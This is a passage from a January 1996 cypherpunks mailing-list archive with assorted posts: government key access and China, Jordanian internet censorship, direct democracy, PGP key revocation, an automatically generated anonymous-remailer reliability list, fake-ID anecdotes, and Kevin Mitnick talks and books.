From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 9 Jan 1996 07:59:23 +0800
To: cypherpunks@toad.com
Subject: Re: "Re: NSA says strong crypto to china??
Message-ID: <199601080808.AAA10674@ix12.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:47 AM 1/7/96 -0800, Raph Levien <raph@c2.org> wrote:
>   My best guess is that we're seeing a distortion of this
>interchange. If I were a Chinese dissident, I wouldn't want to use
>GAK, for three reasons: using US-lackey encryption is certainly not
>going to get you into any _less_ trouble than using independent
>encryption, if you used GAK you'd be working as a US spy whether you
>wanted to be or not, and finally, who says the Chinese can't decrypt
>it, especially with the rapid growth of television.

And, four, there's no guarantee the US keymasters won't burn you
to the Chinese government, if it seems useful in preserving "stability"...

#--
#				Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
#
# "The price of liberty is eternal vigilance" used to mean us watching
# the government, not the other way around....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 8 Jan 1996 14:49:11 +0800
To: cypherpunks@toad.com
Subject: Naw, They Can't Censor the 'Net!
Message-ID: <Pine.BSD.3.91.960108011843.16196C-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain




Friend,


  A 01 07 96 Scripps Howard newsstory reports that a US tele-
  communications firm providing Internet access to Jordan was
  asked by authorities there to install a

                         SCREENING FACILITY

  so censors could preview

                                ANY

  messages

                               LIKELY

  to be

                              PICTURES !


  A censor's life in a screening facility can be hard...but the
  authorities are firm.  There's the urgent

     ...need to prevent the spread of pornography in this con-
     servative desert kingdom.


  And that US telecommunications firm?

     "We agreed with the authorities' request," said GlobeNet's
     vice-president, Carlton Tolsdorf.

     "And, by the way, I think we should have the same thing
     back home in the United States."


  So it too can be a

                            PICTURESQUE

                                               desert kingdom.


  Cordially,

  Jim



  NOTE.  The newsstory's headline?  ARAB WORLD GRAPPLES WITH
         THE INTERNET'S BENEFITS, DRAWBACKS.

         Its dateline?  AMMAN, Jordan (Jan 7, 1996 1:22 p.m. EST).

         Its Nando News online filename?  info57_806.html




 
 








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Evan Ravitz <evan@darkstar.cygnus.com>
Date: Mon, 8 Jan 1996 16:36:43 +0800
To: dnowch2@teleport.com
Subject: Re: DNow2 Re: Hammill 1987 speech
In-Reply-To: <199601080601.WAA09591@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.960108011704.6640P-100000@darkstar.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 7 Jan 1996, Vladimir Z. Nuri wrote:

> while I agree with the libertarian that there are many problems with
> governments, I see no reason to believe that libertarians are proposing
> a workable alternative, 
> 
> rabid libertarianism reminds me of Marxism: sounds great in theory, and
> you might even convince large parts of the population or key people in
> power to follow it. but does it truly present an implementable and workable
> alternative? where are the specifics?

Well put. And where is there a model that works? In Switzerland we have a 
model of 148 years of true democracy, where the people propose and vote 
on legislation. One result is that "pork-barrell" is mimimal, because 
citizens won't vote for it! Libertarians would generally prefer it to 
government by a parasitic ruling class. And libs could propose and 
perhaps pass laws to try out their ideas. 

Here you are limited to begging for mercy. Sure, theoretically, encrypted 
financial transactions on the 'net will inhibit taxation, but Congress 
seems likely to nip that in the bud, massive begging notwithstanding.

The 'net could be used for the interaction of true democracy (along with 
the more available Plain Old Telephone System, fax, paper, etc), as well
as for beggary.

The Swiss experience for 148 years is available for review from the very 
first link from our web site:

     Evan Ravitz, director,  VOTING BY PHONE FOUNDATION:  evanr@vote.org
    Electronic democracy! From the directors of the U.S. National Science 
   Foundation's 1974 Televote trials and Boulder's 1993 ballot initiative:
 http://www.vote.org/v  A FUTURE PASTURES PRESENTATION (303)440-6838 fon/fax 
"What government is best? That which teaches us to govern ourselves." -Goethe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Just Rich <rich@c2.org>
Date: Wed, 10 Jan 1996 02:29:07 +0800
To: cypherpunks@toad.com
Subject: Anyone using Microsoft Access 95?
Message-ID: <199601080931.BAA16945@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Have a hackmsoft submission that needs fleshing out. Not enough general
interest to post in detail. Basically, you're supposed to be able to spoof
the database server as any user.

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 9 Jan 1996 13:55:37 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
Message-ID: <2.2.32.19960108094632.0095dda0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:02 PM 1/7/96 GMT, you wrote:
>shamrock@netcom.com (Lucky Green) writes:
>
>>I would very much like to see expiration dates on public keys. Is PGP 3.0
>>offering this feature?
>
>I would very uch like to see PGP 3.0, but that's another story...

So would I.

I posted a message to alt.security.pgp and sci.crypt stating that "I had
found the release schedule for PGP 3.0 on page 16 of Applied Cryptography
(1st edition) and was wondering if had been updated for the second."  I got
lots of answers, but no one seemed to look at what was on page 16.  (It
happens to be the examples of incredibly huge numbers.)  No wonder I have so
little faith in that newsgroup...

|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Evan Ravitz <evan@darkstar.cygnus.com>
Date: Tue, 9 Jan 1996 01:40:29 +0800
To: dnowch2@teleport.com
Subject: Re: DNow2 Re: Hammill 1987 speech
In-Reply-To: <199601080601.WAA09591@netcom4.netcom.com>
Message-ID: <Pine.SUN.3.91.960108013408.6640R-100000@darkstar.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain



On Sun, 7 Jan 1996, Vladimir Z. Nuri wrote:

> when you focus your attempts on creating a system that embodies your
> ideals...you will make far more
> progress in developing your ideas and convincing the world to follow you
> than any number of essays can accomplish.

As well as the Swiss direct democratic system, at the other end of the 
scale, the poorest people of the Americas have the same idea. The 
Zapatista rebels, laboriously "making all the major decisions by the 
referendum" in 8 Mayan languages in the jungles and mountains of Chiapas, 
have stood off the US-funded Mexican army for 2 years and a week now.

Here's what Bishop of Chiapas Samuel Ruiz, how the world's foremost 
exponent of "liberation theology" has to say:

From: Bill Stivers <stiverpp@corcomsv.corcom.com>
Newsgroups: misc.activism.progressive
Subject: Bishop Ruiz: EZLN Calls People to Civil-Political Action
Followup-To: alt.activism.d
Date: 25 Dec 1995 05:12:59 GMT

	Enclosure one was excerpted from Latinamerica Press, Nov. 23, 1995. LP
contributor Dauno Totoro Taulis interviewed Chiapas Bishop Samuel Ruiz.
-------------


LP: Does the indigenous uprising in Chiapas contradict the dream of
justice and fraternity among men and women?

Ruiz: One must look at the facts. Something awaits the world,
something that can come out of all this. Perhaps it is a certain
model, a road to greater citizen participation in the transformation
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
of their own reality. The EZLN (Zapatista National Liberation Army)
has not called on the people to rise up in arms, it has called on them
to rise up as civic-political actors. It is curious that, after 500
years, when nobody was expecting there to be articulated indigenous
groups but only   "conquered Indians," it is precisely these Indians
who are motivating us to change, to participate.

It is surprising that the most marginalized inhabitants of the
continent, who are on the social floor, are those who are rising up
with the prospects of a transforming success. A voice is being heard
from those living in a culture distinct from the West, from the heart
of the communitarian concept. It is an ancient voice that has never
been heard before--and for this reason appears as a new voice--and it
offers a successful alternative for everyone.

Besides it was always thought that we had to "rescue" the Indians,
that we had to help them, and now they are offering the possibility of
renovation for us.

LP: Isn't it contradictory that to talk of peace, the communities had
to take up arms?

Ruiz: What is new is that those who have risen up in arms did not make
the same decision as the continent's other known armed movements,
which believed that to achieve justice they first had to take power.
The EZLN does not espouse this idea. This is war for peace, a war so
that there is peace, a war in which they are not asking others to rise
up in arms but to rise up as subjects of a transformation.

It is not an armed group talking with a government to reach partial
accords, but a people, an organized civil society, that is
transforming itself through social change. It is a search that has
returned to the subject and protagonist of history, the citizen, the
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
right and duty for his or her own transformation.
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

     Evan Ravitz, director,  VOTING BY PHONE FOUNDATION:  evanr@vote.org
    Electronic democracy! From the directors of the U.S. National Science 
   Foundation's 1974 Televote trials and Boulder's 1993 ballot initiative:
 http://www.vote.org/v  A FUTURE PASTURES PRESENTATION (303)440-6838 fon/fax 
"What government is best? That which teaches us to govern ourselves." -Goethe








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Mon, 8 Jan 1996 22:58:23 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199601081450.GAA30457@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub ek";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reord";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
$remailer{"tjava"} = "<remailer@tjava.com> cpunk mix pgp hash latent cut";
$remailer{"pamphlet"} = "<pamphlet@idiom.com> cpunk pgp hash latent cut ?";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'gondonym'} = '<alias@nym.gondolin.org> alpha pgp';
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 robo hroller alpha)
(gondolin gondonym)
(flame hacktic replay)
(alumni portal)
(vishnu spook wmono)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: all of the "ek" tags have been verified correct. Apologies to
those who were inconvenienced by incorrect "ek" tags in the past.

Last update: Mon 8 Jan 96 6:47:57 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              *+****+***+*     6:11 100.00%
bsu-cs   nowhere@bsu-cs.bsu.edu           #++*##*++#+#     2:43  99.99%
hroller  hroller@c2.org                   .-#*#--#-###    12:12  99.98%
flame    remailer@flame.alias.net         +-++++++++++  1:14:40  99.98%
pamphlet pamphlet@idiom.com               --++++++++++    48:13  99.98%
c2       remail@c2.org                    .-***--*-+**    29:43  99.97%
rmadillo remailer@armadillo.com            ###########     3:46  99.95%
mix      mixmaster@remail.obscura.com     --+--------   3:03:29  99.95%
tjava    remailer@tjava.com               *#*#__-+####  5:22:45  99.93%
amnesia  amnesia@chardos.connix.com       ------+--+-+  3:32:22  99.90%
ecafe    cpunk@remail.ecafe.org           #___.#**####  9:32:42  99.88%
hacktic  remailer@utopia.hacktic.nl       ****** ***+*     8:42  99.83%
penet    anon@anon.penet.fi               ++++++-----   4:54:49  99.74%
vishnu   mixmaster@vishnu.alias.net       -  -**-++*+*    37:22  99.59%
ford     remailer@bi-node.zerberus.de     --++++..--.  10:22:10  99.58%
alumni   hal@alumni.caltech.edu           *-- # -+*+*#    13:39  99.47%
portal   hfinney@shell.portal.com         #-  ########     5:54  99.42%
spook    remailer@valhalla.phoenix.net    --.-+  --.-*  4:03:17  98.30%
wmono    wmono@valhalla.phoenix.net       ***        *    17:40  93.55%
rahul    homer@rahul.net                  +####+######     1:29  99.99%
extropia remail@extropia.wimsey.com       --------      4:58:18  72.87%
shinobi  remailer@shinobi.alias.net       +++- -+       2:02:20  63.07%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andre Bacard <abacard@well.com>
Date: Tue, 9 Jan 1996 01:56:59 +0800
To: cypherpunks@toad.com
Subject: PLAYBOY Magazine, Raph Levien & Remailers
Message-ID: <199601081743.JAA22884@well.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello Remailer Users,
 
The current PLAYBOY magazine refers readers to the web site of Raph
Levien, "The Remailer Guru." Raph's site focuses upon remailers.
 
See the February 1996 PLAYBOY Forum (pages 33-35) interview with yours
truly, Andre Bacard, entitled "The Computers Have Eyes."
 
See you in the future,
Andre Bacard
======================================================================
abacard@well.com                    Bacard wrote "The Computer Privacy
Stanford, California                Handbook" [Intro by Mitchell Kapor].
http://www.well.com/user/abacard    Published by Peachpit Press, (800)
Enjoy your privacy...               283-9444, ISBN # 1-56609-171-3.
=======================================================================
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Dahlgren <kent@trouble.WV.TEK.COM>
Date: Tue, 9 Jan 1996 04:05:23 +0800
To: Clay Olbon II <olbon@dynetics.COM>
Subject: Cool story.
In-Reply-To: <v01510103ad17023672f6@[193.239.225.200]>
Message-ID: <Pine.SUN.3.91.960108094419.261A-100000@trouble>
MIME-Version: 1.0
Content-Type: text/plain



I'm in the Air Guard and have been for almost 10 years. I work in the 
crypto vault, which is really really boring. but we keep it interesting 
by shreading pieces of cardboard in the outer vault and yelling to my 
chief "...O.K. CHIEF...I'M SHREADING THE PICTURES OF THE CRASH SITE IN 
NEVADA...YOU WANT ME TO SHREAD THEM ALL?"

Anyhow, last summer our material controller got tasked by (I think) the 
OSI to do this emergency audit on this unit's material control section up 
in Washington.  There's these cool safes that we use to store our cryto 
in that look kinda like the ones behind Trey at:
 
http://www.msen.com/~olbon/trey.html

These safes are only build and sold for DOD use; you can't buy them as 
civilians.  At least these specific ones are.
So it turns out that the guy who was in charge of the supplies of this 
unit was selling all kinds of stuff at his garage sales, including some 
of these safes.  This civilian bought a safe and a year or so later it 
stopped working, so he called the phone number on the metal tag thats on 
the safe.  The conversation went like this:

Safe manufacturer:  Hello?
Civilian:  Yeah, I got this safe of yours and its broken.
SM:  What unit are you with?
C:  HUH?
SM:  Who are you?
C:  Look, I don't like your attitude.  What does it matter who I am...who 
    are you?!?  I want this thing fixed.
SM:  Are you with the military?
C:  No, why would I be?
SM:  Can I put you on hold for a second, please don't hang up.

You can guess the rest.  It didn't take them long to figure out what 
happened, and the material control guy who sold the safe cut town. but 
they got him.  At least that's how I heard it.  I hate to relay these 
things second hand, but looking at Trey's picture made me remember it.

______________________________________________________________________________
______ T E K T R O N I X _ C P I D _ T E C H N I C A L _ S U P P O R T _______
                      /
 Voice: 1.800.835.6100             E-mail: support@colorprinters.tek.com
    Fax: 1.503.685.3063                WWW: www.tek.com
     BBS: 1.503.685.4504            E-World: Keyword Tektronix
      HAL: 1.503.682.7450                AOL: Keyword Tektronix
   Service: 1.800.835.6100                FTP: ftp.tek.com
______________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Mon, 8 Jan 1996 07:47:41 +0800
To: cypherpunks@toad.com
Subject: Re: Revoking Old Lost Keys
In-Reply-To: <2.2.32.19960106101559.00919d9c@mail.teleport.com>
Message-ID: <pgpmoose.199601081027.31093@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


There hav been a lot of replies to the original
question, but I think a lot of people are missing
a simple solution.

  >>At 7:07 AM 1/6/96, Bruce Baugh wrote:
  >>>I'd like to bring up a problem I haven't seen addressed much yet, and whic
 h
  >>>I think is going to come up with increasing frequency as PGP use spreads.
  >>>
  >>>The problem is this: how can one spread the word that an old key is no
  >>>longer to be used when one no longer has the pass phrase, and cannot
  >>>therefore create a revocation certificate?

You create a revocation certificate at the time
you create the key, and store it somewhere (I'd
recommend putting it on a floppy). Then either
give it to your lawyer, with a note saying "If I
forget the passphrase, give me back this", or
just write a note to yourself, and store it in a
place where you'll find it when the time comes.

It is inconvenient if a nasty third party finds it
while you were still using the key, but much less
damaging than if they found the password.

(Someone wrote that PGP doesn't support revocation
certificates. This is not correct.)

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@cris.com>
Date: Tue, 9 Jan 1996 09:07:51 +0800
To: cypherpunks@toad.com
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <v02120d14ad16610af24f@[192.0.2.1]>
Message-ID: <55entaabdw.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


shamrock@netcom.com (Lucky Green) said:

LG> At 1:40 1/7/96, Frank O'Dwyer wrote:
>> But it is usually easier to determine (and vouch for) who a stranger
>> is than how trustworthy they are, if only because there are quick and
>> easy real-world mechanisms for this (driver's licence,
>> passport,etc.).  That's all I meant.

LG> Though it may seem that way, I am not so sure that it is true. I am
LG> told that you can buy a CA driver licence in the hispanic part of
LG> San Francisco for about $50. Hologram and all.

	60 Minutes did a report a year or so ago where one of their
reporters (Harry Reasoner, I think) purchased various fake IDs, ranging
from drivers licenses to 'green' cards.  The green cards he purchased
were virtually indistinguishable (in quality - the names varied (; )
from his genuine green card (the reporter was/is Canadian).

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 9 Jan 1996 00:08:27 +0800
To: cypherpunks@toad.com
Subject: Cite for Toad Hop
Message-ID: <199601081558.KAA11884@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


There have been inquiries on the source of the "Toad Hop" 
material, some from places to which it was forwarded.


As noted on cypherpunks earlier, the material is directly from:


   Jonathan Littman, an investigative reporter, has published
   "The Fugitive Game: Online With Kevin Mitnick," Little
   Brown, 1996. 381 pp. $23.95. ISBN 0-316-52858-7.

   It is a dramatic recount of Mitnick's exploits; the pursuit
   by Shimomura, Markoff, telcos and Feds; the bust and
   Markoff's tales; The Well controversies and disputes about
   what really happened; suspicions of Shimomura and Markoff -
   their complicity with TLAs, their movie and book
   dealings, their disputes with hackers and journalists. What
   Mitnick was telling Littman while a fugitive.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ee380 <ee380@shasta.Stanford.EDU> (by way of frantz@netcom.com (BillFrantz))
Date: Tue, 9 Jan 1996 03:20:13 +0800
To: cypherpunks@toad.com
Subject: W 4:15 ** Markoff and Shimomura on the pursuit of Kevin Mitnick, ComputerCriminal
Message-ID: <199601081859.KAA28612@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Highly edited announcement perhaps of interest to SF Bay Area cpunks.  My
appologies to those that are not interested in the subject.  -  Bill Frantz


                EE380 Computer Systems Colloquium

Date:           Wednesday, Jan 10,1995  

Time:           4:15-5:30 pm

Location:       Skilling Auditorium, Stanford University, Stanford, CA

Speakers:       John Markoff, New York Times
                Tsutomu Shimomura, San Diego Supercomputer Center

Title:          Takedown: The Capture of Kevin Mitnick

                        Abstract

Shimomura and Markoff will talk about the pursuit and capture of Kevin
Mitnick, a 32-year old computer programmer who was arrested in
Raleigh, N.C. last year by the FBI, after Shimomura, working on behalf
of several Internet service providers,  traced him to an apartment
complex on the outskirts of the city. Shimomura and Markoff have
cooperated to write a soon to be released book about the pursuit,
Takedown (Hyperion 1996)

************************************************************************
* EE380 is the Computer Systems Laboratory Colloquium.  The Colloquium *
* meets most Wednesdays throughout the normal academic year.           *
*                                                                      *
* For information on the class send e-mail with a subject line         *
* mentioning "info" in the subject line to ee380@shasta.stanford.edu.  *
*                                                                      *
* WWW Page:  http://www-leland.stanford.edu/class/ee380                *
************************************************************************






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Cees de Groot" <cg@bofh.toad.com (none)>"Cees de Groot" <C.deGroot@inter.nl.net>
Date: Mon, 8 Jan 1996 22:27:34 +0800
To: grendel@netaxs.com
Subject: Re: Domains, InterNIC, and PGP (and physical locations of hosts, to boot)
In-Reply-To: <Pine.SUN.3.91.960106225307.9277A-100000@unix5.netaxs.com>
Message-ID: <199601081009.LAA27006@bofh.cdg.openlink.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Again, I'm not too sure of the viability of this proposal. Not on
> effectiveness of proving true location -- it is more geared toward
> "visual 3-D packet tracing" -- but simply because I have _no_ fricking
> idea where our machines are (in terms of lat and long) to any degree
> of accuracy. ("They're somewhere in PA." Brilliant, you can find that
> out via WHOIS.) The document suggests using GPS to locate your true
> location, but I'll be damned if my boss is going to spend $1,000 just
> so I can have more DNS entries to maintain...
> 
I think a call to your local land registry office will get you a quite
precise bearing (although I never bothered to actually do that, not even
in the time when people were doing that for UUCP maps). It doesn't solve
the problem for LISP's, however - last time I checked it, MIT gave me
happily access from my CIS account...

-- 
Cees de Groot, OpenLink Software		     <C.deGroot@inter.NL.net>
262ui/2048: ID=4F018825 FP=5653C0DDECE4359D FFDDB8F7A7970789 [Key on servers]
http://web.inter.nl.net/users/inter.NL.net/C/C.deGroot




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Tue, 9 Jan 1996 09:06:52 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: NSA says strong crypto to China?
In-Reply-To: <199601081514.HAA03562@blob.best.net>
Message-ID: <Pine.BSD.3.91.960108104726.19532A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
 Jim, 
 
 
 That's it in a nutshell: They have common interests AND con- 
 flicting interests. 
 
 AND-thinking and the identification of specific time-place- 
 circumstances factors are effectively 
 
                          BANNED. 
 
 
 It's part of the mostly unquestioned "success" of US schools. 
 
 I say mostly because 12 95 The Atlantic Monthly 65 features 
 Paul Gagnon's two essays What Should Children Learn? and 
 Botched Standards. 
 
 
 Cordially, 
 
 Jim 
 
 
 
 INCLOSURE: 
 
 Date: Sun, 07 Jan 1996 19:13:36 -0800
 From: "James A. Donald" <jamesd@echeque.com>
 To: cypherpunks@toad.com
 Subject: Re: NSA says strong crypto to China?

 [deleted] 

 They have common interests and conflicting interests.  They have a 
 common interest in repressing Chinese dissidents, to keep the world
 safe for National Security Agencies.

 [deleted] 
 
 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 9 Jan 1996 08:47:05 +0800
To: Sten Drescher <dreschs@austnsc.tandem.com>
Subject: Re: "trust management" vs. "certified identity"
In-Reply-To: <55entaabdw.fsf@galil.austnsc.tandem.com>
Message-ID: <Pine.ULT.3.91.960108112659.20209I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On 8 Jan 1996, Sten Drescher wrote:

> shamrock@netcom.com (Lucky Green) said:
> 
> LG> At 1:40 1/7/96, Frank O'Dwyer wrote:
> >> But it is usually easier to determine (and vouch for) who a stranger
> >> is than how trustworthy they are, if only because there are quick and
> >> easy real-world mechanisms for this (driver's licence,
> >> passport,etc.).  That's all I meant.
> 
> LG> Though it may seem that way, I am not so sure that it is true. I am
> LG> told that you can buy a CA driver licence in the hispanic part of
> LG> San Francisco for about $50. Hologram and all.
> 
> 	60 Minutes did a report a year or so ago where one of their
> reporters (Harry Reasoner, I think) purchased various fake IDs, ranging
> from drivers licenses to 'green' cards.  The green cards he purchased
> were virtually indistinguishable (in quality - the names varied (; )
> from his genuine green card (the reporter was/is Canadian).

Someone got a McArthur grant for a study of this in Redwood City a couple
years back. She studied the long-term patterns of smuggling between towns
in the SF Bay Peninsula and central Mexico. I saw her speak once, but I
don't remember her name. I could probably find the reference if you're
interested. There haven't been that many McArthur grants.

Any decent book on private investigation should give you enough
information to pass as someone else. 

-rich
 owner-win95netbugs@lists.stanford.edu
 ftp://ftp.stanford.edu/pub/mailing-lists/win95netbugs/
 gopher://quixote.stanford.edu/1m/win95netbugs
 http://www-leland.stanford.edu/~llurch/win95netbugs/faq.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Tue, 9 Jan 1996 03:01:11 +0800
To: cypherpunks@toad.com
Subject: Re: "Microsoft.com" added to my KILL file
Message-ID: <9601081654.AA03388@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim and Lucky were talking....

>>embedded spreadsheets and embedded graphics. And as for attachments, such
>>as attaching programs for running on a machine, mailing list messages are a
>>very poor way to distribute such programs, for many reasons.

        To say nothing of the risk of some nasty Word virus or other
malicious executable.
_______________________
Regards,               Truth can never be told so as to be understood, 
		       and not be believed. -William Blake
Joseph Reagle          http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu         0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Tue, 9 Jan 1996 16:18:40 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Re: Microsoft continues to mislead public about Windows security bugs (a bit long, with references)
Message-ID: <199601090802.AAA13049@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:15 PM 1/8/96 -0800, Rich Graves wrote:
